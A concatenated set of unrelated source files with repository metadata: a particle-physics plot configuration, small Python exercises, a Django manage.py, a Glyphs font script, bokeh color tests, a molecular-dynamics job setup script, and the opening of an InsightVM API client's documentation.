'azure':860,##blue
'gray':920,
}
scriptname=opt.plotFile
if not 'ele' in scriptname:
groupPlot['QCD'] = {
'nameHR' : 'QCD',
'isSignal' : 0,
'color' : dict_TColor['gray'],
'isData' : 0,
'samples' : ['QCD_MU'],
}
if not 'mu' in scriptname:
groupPlot['QCD'] = {
'nameHR' : 'QCD',
'isSignal' : 0,
'color' : dict_TColor['gray'],
'isData' : 0,
'samples' : ['QCD_EM','QCD_bcToE'],
}
groupPlot['TTV'] = {
'nameHR' : 'TTV',
'isSignal' : 0,
'color' : dict_TColor['green'],
'isData' : 0,
'samples' : ['TTWjets','TTZjets'],
}
groupPlot['VV'] = {
'nameHR' : 'VV',
'isSignal' : 0,
'color' : dict_TColor['cyan'],
'isData' : 0,
'samples' : ['WW','WZ','ZZ'],
}
groupPlot['V+jets'] = {
'nameHR' : 'V+jets',
'isSignal' : 0,
'color' : dict_TColor['red'],
'isData' : 0,
'samples' : ['DY','Wjets'],
}
groupPlot['ST'] = {
'nameHR' : 'ST',
'isSignal' : 0,
'color' : dict_TColor['pink'],
'isData' : 0,
'samples' : ['ST'],
}
groupPlot['TT+jj'] = {
'nameHR' : 'TT+jj',
'isSignal' : 0,
'color': dict_TColor['orange'],
'isData' : 0,
'samples' : ['TTLJ_jj','TTLL_jj']
}
groupPlot['TT+bb'] = {
'nameHR' : 'TT+bb',
'isSignal' : 0,
'color': dict_TColor['blue'],
'isData' : 0,
'samples' : ['TTLJ_bb','TTLJ_bj','TTLL_bb','TTLL_bj']
}
groupPlot['TT+cc'] = {
'nameHR' : 'TT+cc',
'isSignal' : 0,
'color': dict_TColor['red']+4,
'isData' : 0,
'samples' : ['TTLJ_cc','TTLL_cc']
}
#for mass in ['075','080','085','090','100','110','120','130','140','150']:
for mass, color in [('090','green'),('120','red'),('150','blue')]:
sample_name = 'CHToCB_M{0}'.format(mass)
groupPlot[sample_name]={
'nameHR':'M{0}(BR=0.01)'.format(mass),
'scale' : 2*(0.01)*(1-0.01)*364.35,
'isData' : 0,
'isSignal' : 2,
'color':dict_TColor[color],
'samples' : [sample_name]
}
if not 'ele' in scriptname:
plot['QCD_MU'] = {
'nameHR' : 'QCD_MU',
'isSignal' : 0,
'color': dict_TColor['gray'],
'isData' : 0,
'samples' : ['QCD_MU']
}
if not 'mu' in scriptname:
plot['QCD_EM'] = {
'nameHR' : 'QCD_EM',
'isSignal' : 0,
'color': dict_TColor['gray'],
'isData' : 0,
'samples' : ['QCD_EM']
}
plot['QCD_bcToE'] = {
'nameHR' : 'QCD_bcToE',
'isSignal' : 0,
'color': dict_TColor['gray']+1,
'isData' : 0,
'samples' : ['QCD_bcToE']
}
plot['WW'] = {
'nameHR' : 'WW',
'isSignal' : 0,
'color': dict_TColor['cyan'],
'isData' : 0,
'samples' : ['WW']
}
plot['WZ'] = {
'nameHR' : 'WZ',
'isSignal' : 0,
'color': dict_TColor['cyan'],
'isData' : 0,
'samples' : ['WZ']
}
plot['ZZ'] = {
'nameHR' : 'ZZ',
'isSignal' : 0,
'color': dict_TColor['cyan'],
'isData' : 0,
'samples' : ['ZZ']
}
plot['DY'] = {
'nameHR' : 'DY',
'isSignal' : 0,
'color': dict_TColor['red'],
'isData' : 0,
'samples' : ['DY']
}
plot['Wjets'] = {
'nameHR' : 'Wjets',
'isSignal' : 0,
'color': dict_TColor['red'],
'isData' : 0,
'samples' : ['Wjets']
}
plot['ST'] = {
'nameHR' : 'ST',
'isSignal' : 0,
'color': dict_TColor['pink'],
'isData' : 0,
'samples' : ['ST']
}
#plot['TTLL'] = {
# 'nameHR' : 'TTLL',
# 'isSignal' : 0,
# 'color': dict_TColor['magenta'],
# 'isData' : 0,
# 'samples' : ['TTLL']
# }
plot['TTLJ_jj'] = {
'nameHR' : 'TTLJ+jj',
'isSignal' : 0,
'color': dict_TColor['orange'],
'isData' : 0,
'samples' : ['TTLJ_jj']
}
plot['TTLJ_cc'] = {
'nameHR' : 'TTLJ+cc',
'isSignal' : 0,
'color': dict_TColor['red']+4,
'isData' : 0,
'samples' : ['TTLJ_cc']
}
plot['TTLJ_bj'] = {
'nameHR' : 'TTLJ+bj',
'isSignal' : 0,
'color': dict_TColor['red']+1,
'isData' : 0,
'samples' : ['TTLJ_bj']
}
plot['TTLJ_bb'] = {
'nameHR' : 'TTLJ+bb',
'isSignal' : 0,
'color': dict_TColor['blue'],
'isData' : 0,
'samples' : ['TTLJ_bb']
}
plot['TTLL_jj'] = {
'nameHR' : 'TTLL+jj',
'isSignal' : 0,
'color': dict_TColor['orange'],
'isData' : 0,
'samples' : ['TTLL_jj']
}
plot['TTLL_cc'] = {
'nameHR' : 'TTLL+cc',
'isSignal' : 0,
'color': dict_TColor['red']+4,
'isData' : 0,
'samples' : ['TTLL_cc']
}
plot['TTLL_bj'] = {
'nameHR' : 'TTLL+bj',
'isSignal' : 0,
'color': dict_TColor['red']+1,
'isData' : 0,
'samples' : ['TTLL_bj']
}
plot['TTLL_bb'] = {
'nameHR' : 'TTLL+bb',
'isSignal' : 0,
'color': dict_TColor['blue'],
'isData' : 0,
'samples' : ['TTLL_bb']
}
plot['TTWjets'] = {
'nameHR' : 'TTWjets',
'isSignal' : 0,
'color': dict_TColor['green'],
'isData' : 0,
'samples' : ['TTWjets']
}
plot['TTZjets'] = {
'nameHR' : 'TTZjets',
'isSignal' : 0,
'color': dict_TColor['green'],
'isData' : 0,
'samples' : ['TTZjets']
}
plot['DATA'] = {
'nameHR' : 'DATA',
'isSignal' : 0,
'color': 1,
'isData' : 1 ,
'isBlind' : 0,
'samples' : ['DATA']
}
#for mass in ['075','080','085','090','100','110','120','130','140','150']:
#for mass, color in [('090','green'),('120','red'),('150','blue')]:
# sample_name = 'CHToCB_M{0}'.format(mass)
# plot[sample_name]={
# 'nameHR':'M{0}(BR=0.01)'.format(mass),
# 'scale' : 2*(0.01)*(1-0.01)*364.35,
# 'isData' : 0,
# 'isSignal' : 2,
# 'color':dict_TColor[color],
# 'samples' : [sample_name]
# }
#import sys
#sys.path.insert(0, "MassPoints")
#from List_MX import *
#from List_MX_VBF import *
#
#
##for MX in List_MX:
#for MX in [900]:
#
# plot['ggHWWlnuqq_M'+str(MX)]={
# 'nameHR':'ggHWWlnuqq_M'+str(MX),
# #'scale' : 100,
# 'isData' : 0,
# 'isSignal' : 1,
# 'color':dict_TColor['red'],
# 'samples' : ['ggHWWlnuqq_M'+str(MX)]
# }
#
##for MX in List_MX_VBF:
#for MX in [900]:
# plot['vbfHWWlnuqq_M'+str(MX)]={
# 'nameHR':'vbfHWWlnuqq_M'+str(MX),
# 'isData' : 0,
# 'isSignal' : 1,
# #'scale' : 100,
# 'color':dict_TColor['blue'],
# 'samples' : ['ggHWWlnuqq_M'+str(MX)]
# }
legend['lumi'] = 'L = 19.5/fb'
legend['sqrt'] = '#sqrt{s} = 13 TeV'
legend['extraText'] = 'work in progress'
|
[
"bh.oh@cern.ch"
] |
bh.oh@cern.ch
|
f4f472f18b95743fd61dc350b332932577e6dacc
|
b8eb666c8b6fe4610d87bff8048f4a95a1c5b549
|
/测试/UI自动化/测试工具__Appium/Project/bin/do.py
|
7bac86077f5a081ccaefee08dfceb4a5c78641a4
|
[] |
no_license
|
cainiaosun/study
|
1e983e404005e537410b205634a27cee974faba0
|
91df9b63cda1839b7fc60de3b5f1eb19ccc33a1f
|
refs/heads/master
| 2020-05-30T09:59:19.749099
| 2019-11-22T10:39:12
| 2019-11-22T10:39:12
| 189,641,828
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 46
|
py
|
class parent:
    def sum(self, a, b):
        return a + b
|
[
"1551577567@qq.com"
] |
1551577567@qq.com
|
c958cb5a82f6c8104bc7e0444032862e11459094
|
6b63f4fc5105f3190014e1dd5685a891a74f8c63
|
/0050_desafio.py
|
5be9a03b2c845818497d762946f24cd25bcae2ca
|
[] |
no_license
|
matheuszei/Python_DesafiosCursoemvideo
|
a711c7c9c6db022cc8a16a3a1dc59afabb586105
|
5b216908dd0845ba25ee6d2e6f8b3e9419c074d2
|
refs/heads/main
| 2023-05-10T18:13:09.785651
| 2021-06-04T13:50:48
| 2021-06-04T13:50:48
| 370,851,791
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 323
|
py
|
# Develop a program that reads six integers and shows the sum of only
# those that are even. If the value entered is odd, ignore it.
soma = 0
for c in range(0, 6):
n = int(input('({}) Digite um valor: '.format(c)))
if n % 2 == 0:
soma += n
print('Soma total: {}'.format(soma))
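# e.g. entering 1, 2, 3, 4, 5, 6 prints "Soma total: 12" (2 + 4 + 6).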
|
[
"noreply@github.com"
] |
matheuszei.noreply@github.com
|
791915d263580e71b002e57d99955b163d92e7ef
|
bb53f1d84171b1c12d06c4729fc41942bcccfc84
|
/genesis/manage.py
|
46fc6b506b6a60ca89b9ee67150249a5ef101ce1
|
[] |
no_license
|
genesiscurso2020/genesisgit
|
ad1e6a5508291fca3e379837a211d29383e2fc1d
|
2b66b3ee73d3c6397e71a51b1e0f453557d0c1da
|
refs/heads/master
| 2023-04-04T20:10:28.919549
| 2021-04-06T17:42:07
| 2021-04-06T17:42:07
| 355,281,076
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 627
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'genesis.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"gjangoinminutes@gmail.com"
] |
gjangoinminutes@gmail.com
|
8d92e4c3a4b1b88ae82f1dff436289a50a3edeaa
|
83d657c787529f01a8ecc8a874421738a7eecec7
|
/Components/Decompose Corner and Cap Components.py
|
1dd679598592878764a5f6a5b69a03429fbcd0da
|
[
"Apache-2.0"
] |
permissive
|
BurgAndOeden/Glyphs-Scripts
|
e31b5164b491dfe0cd2d57f6cf1422c4aadda104
|
f0195d6b8f0a6c055e4e44d5ef41ba48bdd1e3a6
|
refs/heads/master
| 2020-09-16T08:01:06.345898
| 2019-11-24T00:15:44
| 2019-11-24T00:15:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,498
|
py
|
#MenuTitle: Decompose Corner and Cap Components
# -*- coding: utf-8 -*-
__doc__="""
Recreates the current paths without caps or components.
"""
from Foundation import NSClassFromString
thisFont = Glyphs.font # frontmost font
selectedLayers = thisFont.selectedLayers # active layers of selected glyphs
removeOverlapFilter = NSClassFromString("GlyphsFilterRemoveOverlap").alloc().init()
gridSize = float(thisFont.gridMain())/thisFont.gridSubDivision()
def removeCorners(thisLayer):
numOfHints = len(thisLayer.hints)
for i in range(numOfHints)[::-1]:
if thisLayer.hints[i].type == 16: # corner
thisLayer.removeObjectFromHintsAtIndex_(i)
def removeCaps(thisLayer):
numOfHints = len(thisLayer.hints)
for i in range(numOfHints)[::-1]:
if thisLayer.hints[i].type == 17: # cap
thisLayer.removeObjectFromHintsAtIndex_(i)
def process( thisLayer ):
pen = GSBezStringPen.alloc().init()
for thisPath in thisLayer.paths:
thisPath.drawInPen_(pen)
pathString = pen.charString()
newPaths = removeOverlapFilter.pathsFromBez_gridSize_(pathString,gridSize)
removeCaps(thisLayer)
removeCorners(thisLayer)
thisLayer.paths = newPaths
thisFont.disableUpdateInterface() # suppresses UI updates in Font View
for thisLayer in selectedLayers:
thisGlyph = thisLayer.parent
print "Processing", thisGlyph.name
thisGlyph.beginUndo() # begin undo grouping
process( thisLayer )
thisGlyph.endUndo() # end undo grouping
thisFont.enableUpdateInterface() # re-enables UI updates in Font View
|
[
"res@glyphsapp.com"
] |
res@glyphsapp.com
|
1d6318d6da52ddd15efa39e18f8a38efab9c2016
|
2729fff7cb053d2577985d38c8962043ee9f853d
|
/bokeh/colors/tests/test_rgb.py
|
38a92fcdc5718cea5c5cb924d3373c70544bb3a2
|
[
"BSD-3-Clause"
] |
permissive
|
modster/bokeh
|
2c78c5051fa9cac48c8c2ae7345eafc54b426fbd
|
60fce9003aaa618751c9b8a3133c95688073ea0b
|
refs/heads/master
| 2020-03-29T01:13:35.740491
| 2018-09-18T06:08:59
| 2018-09-18T06:08:59
| 149,377,781
| 1
| 0
|
BSD-3-Clause
| 2018-09-19T02:02:49
| 2018-09-19T02:02:49
| null |
UTF-8
|
Python
| false
| false
| 4,379
|
py
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2017, Anaconda, Inc. All rights reserved.
#
# Powered by the Bokeh Development Team.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
from bokeh.colors import HSL
# Module under test
import bokeh.colors.rgb as bcr
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class Test_RGB(object):
def test_init(self):
c = bcr.RGB(10, 20, 30)
assert c
assert c.a == 1.0
assert c.r == 10
assert c.g == 20
assert c.b == 30
c = bcr.RGB(10, 20, 30, 0.3)
assert c
assert c.a == 0.3
assert c.r == 10
assert c.g == 20
assert c.b == 30
def test_repr(self):
c = bcr.RGB(10, 20, 30)
assert repr(c) == c.to_css()
c = bcr.RGB(10, 20, 30, 0.3)
assert repr(c) == c.to_css()
def test_copy(self):
c = bcr.RGB(10, 0.2, 0.3)
c2 = c.copy()
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
def test_from_hsl(self):
c = HSL(10, 0.1, 0.2)
c2 = bcr.RGB.from_hsl(c)
assert c2 is not c
assert c2.a == 1.0
assert c2.r == 56
assert c2.g == 48
assert c2.b == 46
c = HSL(10, 0.1, 0.2, 0.3)
c2 = bcr.RGB.from_hsl(c)
assert c2 is not c
assert c2.a == 0.3
assert c2.r == 56
assert c2.g == 48
assert c2.b == 46
def test_from_rgb(self):
c = bcr.RGB(10, 20, 30)
c2 = bcr.RGB.from_rgb(c)
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
c = bcr.RGB(10, 20, 30, 0.1)
c2 = bcr.RGB.from_rgb(c)
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
def test_to_css(self):
c = bcr.RGB(10, 20, 30)
assert c.to_css() == "rgb(10, 20, 30)"
c = bcr.RGB(10, 20, 30, 0.3)
assert c.to_css() == "rgba(10, 20, 30, 0.3)"
    def test_to_hex(self):
        c = bcr.RGB(10, 20, 30)
        # compare explicitly; a bare ``assert expr, msg`` can never fail
        assert c.to_hex() == "#%02X%02X%02X" % (c.r, c.g, c.b)
def test_to_hsl(self):
c = bcr.RGB(255, 100, 0)
c2 = c.to_hsl()
assert c2 is not c
assert c2.a == c.a
assert c2.h == 24
assert c2.s == 1.0
assert c2.l == 0.5
c = bcr.RGB(255, 100, 0, 0.1)
c2 = c.to_hsl()
assert c2 is not c
assert c2.a == c.a
assert c2.h == 24
assert c2.s == 1.0
assert c2.l == 0.5
def test_to_rgb(self):
c = bcr.RGB(10, 20, 30)
c2 = c.to_rgb()
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
c = bcr.RGB(10, 20, 30, 0.1)
c2 = c.to_rgb()
assert c2 is not c
assert c2.a == c.a
assert c2.r == c.r
assert c2.g == c.g
assert c2.b == c.b
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
|
[
"noreply@github.com"
] |
modster.noreply@github.com
|
aa247b139b389b58a5500dc4c769591494b5cef3
|
ac5e52a3fc52dde58d208746cddabef2e378119e
|
/exps-sblp-obt/sblp_ut=3.5_rd=0.5_rw=0.04_rn=4_u=0.075-0.325_p=harmonic-2/sched=RUN_trial=35/sched.py
|
a0392c19ab7309ecc424144631532e7acfb8ce71
|
[] |
no_license
|
ricardobtxr/experiment-scripts
|
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
|
7bcebff7ac2f2822423f211f1162cd017a18babb
|
refs/heads/master
| 2023-04-09T02:37:41.466794
| 2021-04-25T03:27:16
| 2021-04-25T03:27:16
| 358,926,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 493
|
py
|
-S 2 -X RUN -Q 0 -L 1 73 250
-S 2 -X RUN -Q 0 -L 1 47 150
-S 2 -X RUN -Q 0 -L 1 39 150
-S 1 -X RUN -Q 1 -L 1 36 200
-S 1 -X RUN -Q 1 -L 1 34 150
-S 1 -X RUN -Q 1 -L 1 34 125
-S 0 -X RUN -Q 2 -L 1 32 200
-S 0 -X RUN -Q 2 -L 1 29 400
-S 0 -X RUN -Q 2 -L 1 28 125
-S 3 -X RUN -Q 3 -L 1 27 150
-S 3 -X RUN -Q 3 -L 1 27 250
-S 4 27 200
-S 5 25 300
-S 4 25 175
-S 4 21 150
-S 4 21 125
-S 4 17 125
-S 4 15 125
-S 4 13 125
-S 5 10 100
-S 5 10 125
|
[
"ricardo.btxr@gmail.com"
] |
ricardo.btxr@gmail.com
|
4d7083ee858b963ff2f612fec11bc7c74866bf28
|
f3b233e5053e28fa95c549017bd75a30456eb50c
|
/bace_input/L4M/4M-4K_MD_NVT_rerun/set_2.py
|
999213e504175ebbc8551697fbbec3b3df615cab
|
[] |
no_license
|
AnguseZhang/Input_TI
|
ddf2ed40ff1c0aa24eea3275b83d4d405b50b820
|
50ada0833890be9e261c967d00948f998313cb60
|
refs/heads/master
| 2021-05-25T15:02:38.858785
| 2020-02-18T16:57:04
| 2020-02-18T16:57:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 740
|
py
|
import os
dir = '/mnt/scratch/songlin3/run/bace/L4M/MD_NVT_rerun/ti_one-step/4M_4K/'
filesdir = dir + 'files/'
temp_prodin = filesdir + 'temp_prod_2.in'
temp_pbs = filesdir + 'temp_2.pbs'
lambd = [ 0.00922, 0.04794, 0.11505, 0.20634, 0.31608, 0.43738, 0.56262, 0.68392, 0.79366, 0.88495, 0.95206, 0.99078]
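# These 12 lambda windows match the standard 12-point Gaussian-quadrature
# schedule commonly used for AMBER thermodynamic integration (inferred
# from the values; the script itself does not say so).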
for j in lambd:
os.chdir("%6.5f" %(j))
workdir = dir + "%6.5f" %(j) + '/'
#prodin
prodin = workdir + "%6.5f_prod_2.in" %(j)
os.system("cp %s %s" %(temp_prodin, prodin))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, prodin))
#PBS
pbs = workdir + "%6.5f_2.pbs" %(j)
os.system("cp %s %s" %(temp_pbs, pbs))
os.system("sed -i 's/XXX/%6.5f/g' %s" %(j, pbs))
#submit pbs
#os.system("qsub %s" %(pbs))
os.chdir(dir)
|
[
"songlin3@msu.edu"
] |
songlin3@msu.edu
|
833502e31a08a9076d125cf4da8732dc6e9093f4
|
4a3b651b892121b149406b0c11ded96dfbbbc309
|
/nidm_neo4j.py
|
50a797ccba84c66d1bd7196a27fa18d7c7e1d151
|
[] |
no_license
|
vsoch/nidm-neo4j
|
78c10f7540b4462997e57075fe55466fec2322f6
|
00c4a077e416ced19b6d3d246ac959e9a8ffb004
|
refs/heads/master
| 2021-01-10T01:36:01.665912
| 2015-10-15T20:17:46
| 2015-10-15T20:17:46
| 44,143,178
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,416
|
py
|
from nidmviewer.convert import get_lookups, get_nidm_keys, get_field_groups
from nidmviewer.convert import getjson
from rdflib.serializer import Serializer
from rdflib import Graph as graphrdf, plugin
import rdfextras
rdfextras.registerplugins()
plugin.register(
'json-ld',
Serializer,
'rdflib_jsonld.serializer',
'JsonLDSerializer')
import numpy
import json
import re
import os
import sys
ttl_file = sys.argv[1]
outfolder = sys.argv[2]
username = sys.argv[3]
repo_name = sys.argv[4]
if not os.path.exists(outfolder):
os.mkdir(outfolder)
ttl = getjson(ttl_file)
# create a node
def create_node(nid,node_type,uid,name,properties):
node_type = node_type.lower().replace(" ","").replace("'","").replace("-","")
name = name.replace("'","").replace("-","")
if len(properties) > 0:
property_string = ""
for p in range(len(properties)):
property_name = properties[p][0].lower().replace(" ","").replace("'","").replace("-","")
property_value = properties[p][1]
property_string = "%s %s : '%s'," %(property_string,property_name,property_value)
property_string = property_string[:-1]
return "create (_%s:%s { id : '%s', name :'%s', %s})\n" %(nid,node_type,uid,name,property_string)
else:
return "create (_%s:%s { id : '%s', name :'%s'})\n" %(nid,node_type,uid,name)
# create a relationship
def create_relation(nid1,nid2,relationship):
relationship = relationship.upper().replace("'","").replace("-","")
return "create _%s-[:`%s`]->_%s\n" %(nid1,relationship,nid2)
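# For example (hypothetical values):
#
#     create_node(1, "Peak", "niiri:123", "peak_1", [("pvalue", "0.05")])
#     # -> "create (_1:peak { id : 'niiri:123', name :'peak_1',  pvalue : '0.05'})\n"
#     create_relation(1, 2, "atLocation")
#     # -> "create _1-[:`ATLOCATION`]->_2\n"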
fields,lookup = get_lookups(ttl)
groups = get_field_groups(ttl)
manual_fields = get_nidm_keys()
for name,uri in manual_fields.iteritems():
if uri not in lookup:
lookup[uri] = name
# First we will save data structures to look up node ids based on URI
nodes = dict()
count = 1
for result in ttl:
rgroup = [x for x in result["@type"] if x in groups][0]
rtype = [x for x in result["@type"] if x != rgroup]
if len(rtype)>0:
rtype = rtype[0]
if rtype in lookup.keys():
result_id = result["@id"].encode("utf-8")
if result_id not in nodes:
nodes[result_id] = count
count +=1
# Define ids of relationships
labeluri = "http://www.w3.org/2000/01/rdf-schema#label"
relations = list()
neo4j = list()
for result in ttl:
rgroup = [x for x in result["@type"] if x in groups][0]
rtype = [x for x in result["@type"] if x != rgroup]
if len(rtype)>0:
rtype = rtype[0]
if rtype in lookup.keys():
            result_id = result["@id"]
            node_id = nodes[result_id]  # node id assigned to this URI in the first pass
label = lookup[rtype]
if labeluri in result:
name = result[labeluri][0]["@value"].encode("utf-8")
else:
name = "%s_%s" %(label,count)
# Find things we know about
data = [x for x in result.keys() if x in lookup.keys()]
data_labels = [lookup[d] for d in data]
# We will save a list of properties and values for the node
properties = []
for d in range(len(data)):
datum = data[d]
human_label = data_labels[d]
# If it just has an id, assume it's a relationship
if "@id" in result[datum][0].keys():
if result[datum][0]["@id"] in nodes:
relation_id = nodes[result[datum][0]["@id"]]
relationship = lookup[datum]
relations.append(create_relation(node_id,relation_id,relationship))
count+=1
# If it has type and value, it's a property
if "@value" in result[datum][0].keys():
property_name = lookup[datum]
property_value = result[datum][0]["@value"]
properties.append((property_name,property_value))
# Now create the node!
new_node = create_node(node_id,label,result_id,name,properties)
neo4j.append(new_node.encode("utf-8"))
# Now print to file!
filey = open("%s/graph.gist" %(outfolder),'w')
filey.writelines("= %s\n:neo4j-version: 2.0.0\n:author: Nidash Working Group\n:twitter: @nidm\n:tags: nidm:nidash:informatics:neuroimaging:data-structure\n'''\nThis is a neo4j graph to show the turtle file %s.\n'''\n[source, cypher]\n----\n" %(ttl_file,ttl_file))
for node in neo4j:
filey.writelines(node)
for relation in relations:
filey.writelines(relation)
filey.writelines("----\n//graph\nWe can use cypher to query the graph, here are some examples:\n[source, cypher]\n----\nMATCH (p:peak)-[l:ATLOCATION]->(c:coordinate) RETURN c as coordinate, p as peak\n----\n//table\n'''\n[source, cypher]\n----\nMATCH (p:peak)-[l:ATLOCATION]->(c:coordinate) RETURN c.name as name, c.coordinatevector as coordinate, p.equivalent_zstatistic as z, p.name as peak_name, p.pvalue_uncorrected as pvalue_uncorrected\n----\n//table\n'''\n== NIDM Working Group\n* link:http://nidm.nidash.org/[NIDM Standard]\n")
filey.close()
# Now write a Readme to link the gist
filey = open("%s/README.md" %(outfolder),'w')
filey.writelines("### %s\n" %(ttl_file))
filey.writelines("[view graph](http://gist.neo4j.org/?github-"+ username + "%2F" + repo_name + "%2F%2F" + outfolder + "%2Fgraph.gist)\n")
filey.close()
|
[
"vsochat@stanford.edu"
] |
vsochat@stanford.edu
|
aefe8b6b4ca8c34b9daa6f1101d9edf3096dba5a
|
e7a5e140ccacc10a4c51b66fa5942974330cce2c
|
/py_insightvm_sdk/models/discovery_search_criteria.py
|
1d1de193d4cc42310dabe5624fcece0162396b08
|
[
"Apache-2.0"
] |
permissive
|
greenpau/py_insightvm_sdk
|
38864c7e88000181de5c09302b292b01d90bb88c
|
bd881f26e14cb9f0f9c47927469ec992de9de8e6
|
refs/heads/master
| 2020-04-21T08:22:31.431529
| 2020-02-27T02:25:46
| 2020-02-27T02:25:46
| 169,417,392
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 54,623
|
py
|
# coding: utf-8
"""
InsightVM API
# Overview This guide documents the InsightVM Application Programming Interface (API) Version 3. This API supports the Representation State Transfer (REST) design pattern. Unless noted otherwise this API accepts and produces the `application/json` media type. This API uses Hypermedia as the Engine of Application State (HATEOAS) and is hypermedia friendly. All API connections must be made to the security console using HTTPS. ## Versioning Versioning is specified in the URL and the base path of this API is: `https://<host>:<port>/api/3/`. ## Specification An <a target=\"_blank\" href=\"https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md\">OpenAPI v2</a> specification (also known as Swagger 2) of this API is available. Tools such as <a target=\"_blank\" href=\"https://github.com/swagger-api/swagger-codegen\">swagger-codegen</a> can be used to generate an API client in the language of your choosing using this specification document. <p class=\"openapi\">Download the specification: <a class=\"openapi-button\" target=\"_blank\" download=\"\" href=\"/api/3/json\"> Download </a></p> ## Authentication Authorization to the API uses HTTP Basic Authorization (see <a target=\"_blank\" href=\"https://www.ietf.org/rfc/rfc2617.txt\">RFC 2617</a> for more information). Requests must supply authorization credentials in the `Authorization` header using a Base64 encoded hash of `\"username:password\"`. <!-- ReDoc-Inject: <security-definitions> --> ### 2FA This API supports two-factor authentication (2FA) by supplying an authentication token in addition to the Basic Authorization. The token is specified using the `Token` request header. To leverage two-factor authentication, this must be enabled on the console and be configured for the account accessing the API. ## Resources ### Naming Resource names represent nouns and identify the entity being manipulated or accessed. All collection resources are pluralized to indicate to the client they are interacting with a collection of multiple resources of the same type. Singular resource names are used when there exists only one resource available to interact with. The following naming conventions are used by this API: | Type | Case | | --------------------------------------------- | ------------------------ | | Resource names | `lower_snake_case` | | Header, body, and query parameters parameters | `camelCase` | | JSON fields and property names | `camelCase` | #### Collections A collection resource is a parent resource for instance resources, but can itself be retrieved and operated on independently. Collection resources use a pluralized resource name. The resource path for collection resources follow the convention: ``` /api/3/{resource_name} ``` #### Instances An instance resource is a \"leaf\" level resource that may be retrieved, optionally nested within a collection resource. Instance resources are usually retrievable with opaque identifiers. The resource path for instance resources follows the convention: ``` /api/3/{resource_name}/{instance_id}... ``` ## Verbs The following HTTP operations are supported throughout this API. The general usage of the operation and both its failure and success status codes are outlined below. | Verb | Usage | Success | Failure | | --------- | ------------------------------------------------------------------------------------- | ----------- | -------------------------------------------------------------- | | `GET` | Used to retrieve a resource by identifier, or a collection of resources by type. 
| `200` | `400`, `401`, `402`, `404`, `405`, `408`, `410`, `415`, `500` | | `POST` | Creates a resource with an application-specified identifier. | `201` | `400`, `401`, `404`, `405`, `408`, `413`, `415`, `500` | | `POST` | Performs a request to queue an asynchronous job. | `202` | `400`, `401`, `405`, `408`, `410`, `413`, `415`, `500` | | `PUT` | Creates a resource with a client-specified identifier. | `200` | `400`, `401`, `403`, `405`, `408`, `410`, `413`, `415`, `500` | | `PUT` | Performs a full update of a resource with a specified identifier. | `201` | `400`, `401`, `403`, `405`, `408`, `410`, `413`, `415`, `500` | | `DELETE` | Deletes a resource by identifier or an entire collection of resources. | `204` | `400`, `401`, `405`, `408`, `410`, `413`, `415`, `500` | | `OPTIONS` | Requests what operations are available on a resource. | `200` | `401`, `404`, `405`, `408`, `500` | ### Common Operations #### OPTIONS All resources respond to the `OPTIONS` request, which allows discoverability of available operations that are supported. The `OPTIONS` response returns the acceptable HTTP operations on that resource within the `Allow` header. The response is always a `200 OK` status. ### Collection Resources Collection resources can support the `GET`, `POST`, `PUT`, and `DELETE` operations. #### GET The `GET` operation invoked on a collection resource indicates a request to retrieve all, or some, of the entities contained within the collection. This also includes the optional capability to filter or search resources during the request. The response from a collection listing is a paginated document. See [hypermedia links](#section/Overview/Paging) for more information. #### POST The `POST` is a non-idempotent operation that allows for the creation of a new resource when the resource identifier is not provided by the system during the creation operation (i.e. the Security Console generates the identifier). The content of the `POST` request is sent in the request body. The response to a successful `POST` request should be a `201 CREATED` with a valid `Location` header field set to the URI that can be used to access to the newly created resource. The `POST` to a collection resource can also be used to interact with asynchronous resources. In this situation, instead of a `201 CREATED` response, the `202 ACCEPTED` response indicates that processing of the request is not fully complete but has been accepted for future processing. This request will respond similarly with a `Location` header with link to the job-oriented asynchronous resource that was created and/or queued. #### PUT The `PUT` is an idempotent operation that either performs a create with user-supplied identity, or a full replace or update of a resource by a known identifier. The response to a `PUT` operation to create an entity is a `201 Created` with a valid `Location` header field set to the URI that can be used to access to the newly created resource. `PUT` on a collection resource replaces all values in the collection. The typical response to a `PUT` operation that updates an entity is hypermedia links, which may link to related resources caused by the side-effects of the changes performed. #### DELETE The `DELETE` is an idempotent operation that physically deletes a resource, or removes an association between resources. The typical response to a `DELETE` operation is hypermedia links, which may link to related resources caused by the side-effects of the changes performed. 
